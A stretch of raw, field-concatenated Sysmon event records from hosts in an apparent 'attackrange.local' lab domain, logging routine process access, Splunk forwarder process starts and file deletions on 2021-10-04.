07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081015Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081014Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B1D2-615A-3701-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081013Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1D2-615A-3701-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081012Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.738{2FDD8D40-B1D2-615A-3701-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081011Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.377{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=223210C797BC5A5D9CF1BD1BECFC035C,SHA256=2E83486C3BE5792B5171809289A31B701BAC578DE3F9C0B026CB9D3B2C473EB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103133Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:35.862{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF197B5D34446242DA79A6C0F2B990B3,SHA256=AC55BEED51534904C29DBDCED8E30EC8B8B5185FEFC78E55F0C0F74AF83B6862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081041Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.983{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B71013772C3E5297E2DAD389322ACB1,SHA256=30829F7D05AEA712B33247BFD53BFF499B5C812789FE549EFE84A05F38328992,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081040Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.952{2FDD8D40-B1D3-615A-3801-00000000FD01}12681208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081039Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1D3-615A-3801-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081038Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081037Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081036Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081035Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081034Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081033Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081032Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081031Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081030Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081029Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B1D3-615A-3801-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081028Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1D3-615A-3801-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081027Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:35.784{2FDD8D40-B1D3-615A-3801-00000000FD01}1268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103134Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:36.877{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF77C5004B9E4518ED9EB3882196FB3,SHA256=81ACAD61DBE450588F2C6A7B103C12411E0523ACC386685C0FCF82601CE1FA35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081056Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.718{2FDD8D40-B1D4-615A-3901-00000000FD01}3162644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081055Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1D4-615A-3901-00000000FD01}316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081054Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081053Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081052Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081051Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:36.577{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081050Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 